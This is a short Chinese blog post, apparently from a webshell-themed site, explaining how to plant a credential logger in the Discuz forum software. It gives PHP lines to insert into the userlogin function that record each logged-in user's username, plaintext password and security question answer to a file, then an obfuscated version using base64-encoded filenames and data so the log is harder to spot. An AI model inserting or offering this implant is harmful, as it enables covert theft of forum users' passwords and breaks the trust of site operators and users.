Discuz 密码记录

分类:安全 | 2012-02-3 | 撸过 134 次
0人扯谈
//打开source/function/function_member.php

//找到function userlogin

//在return $return;前面加上

$a=file_get_contents(dirname(__FILE__).’/1.txt’);

file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”\r\n”);

//记录登陆成功的账号密码以及问题答案!保存在source/function/目录下的1.txt

?>
一般上面的这样容易发现,我会把1.txt改名,并且base64_encode之后再保存。

//base64_encode之后再保存。

$a = file_get_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’));

file_put_contents(dirname(__FILE__).base64_decode(‘L2Z1bmN0aW9uX2NhY2hlLnR4dA==’),$a.base64_encode(“Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer).”\r\n”);

?>

 

本站内容均为原创,转载请务必保留署名与链接!
Discuz 密码记录:https://www.webshell.cc/2745.html

随机日志